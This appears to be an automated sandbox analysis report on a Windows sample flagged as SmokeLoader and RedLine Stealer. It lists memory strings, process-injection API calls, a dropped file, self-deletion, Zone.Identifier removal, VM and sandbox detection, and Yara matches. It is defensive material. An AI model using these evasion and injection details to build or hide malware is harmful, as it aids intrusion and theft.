Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1917493591.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1917493591.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtEnumerateKey,wcsstr,	5_2_004032C7
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_00415530		0_2_00415530
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_00415530		5_2_00415530

Source: K80v6DHFHE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: K80v6DHFHE.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wafguag.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/2@6/2

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

Code function: 0_2_02B8016D CreateToolhelp32Snapshot,Module32First,

0_2_02B8016D

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wafguag

Jump to behavior

Source: K80v6DHFHE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: K80v6DHFHE.exe	ReversingLabs: Detection: 39%
Source: K80v6DHFHE.exe	Virustotal: Detection: 41%

Source: unknown	Process created: C:\Users\user\Desktop\K80v6DHFHE.exe "C:\Users\user\Desktop\K80v6DHFHE.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wafguag C:\Users\user\AppData\Roaming\wafguag
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wafguag C:\Users\user\AppData\Roaming\wafguag

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Unpacked PE file: 0.2.K80v6DHFHE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dazit:W;.xepegi:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wafguag	Unpacked PE file: 5.2.wafguag.400000.0.unpack .text:ER;.rdata:R;.data:W;.dazit:W;.xepegi:W;.rsrc:R; vs .text:EW;

Source: K80v6DHFHE.exe	Static PE information: section name: .dazit
Source: K80v6DHFHE.exe	Static PE information: section name: .xepegi
Source: wafguag.1.dr	Static PE information: section name: .dazit
Source: wafguag.1.dr	Static PE information: section name: .xepegi

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02B83BC6 push esp; ret	0_2_02B83BC8
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02B81F69 push B63524ADh; retn 001Fh	0_2_02B81FA0
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02B82A66 pushfd ; iretd	0_2_02B82A67
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Code function: 0_2_02C71540 pushad ; ret	0_2_02C71550
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02C81540 pushad ; ret	5_2_02C81550
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02E020FE pushfd ; iretd	5_2_02E020FF
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02E0325E push esp; ret	5_2_02E03260
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02E01601 push B63524ADh; retn 001Fh	5_2_02E01638
Source: C:\Users\user\AppData\Roaming\wafguag	Code function: 5_2_02E07399 push ebp; retf	5_2_02E0739A

Source: K80v6DHFHE.exe	Static PE information: section name: .text entropy: 7.534628882954891
Source: wafguag.1.dr	Static PE information: section name: .text entropy: 7.534628882954891

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wafguag

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wafguag

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\k80v6dhfhe.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wafguag:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wafguag	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\K80v6DHFHE.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\K80v6DHFHE.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\wafguag	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\wafguag	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wafguag, 00000005.00000002.2220941358.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 385	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1153	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 611	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3986	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 893	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 853	Jump to behavior

Source: C:\Windows\explorer.exe TID: 5964	Thread sleep count: 385 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2424	Thread sleep count: 1153 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2424	Thread sleep time: -115300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2212	Thread sleep count: 611 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2212	Thread sleep time: -61100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1868	Thread sleep count: 280 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5608	Thread sleep count: 320 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5608	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3688	Thread sleep count: 268 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2424	Thread sleep count: 3986 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2424	Thread sleep time: -398600s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
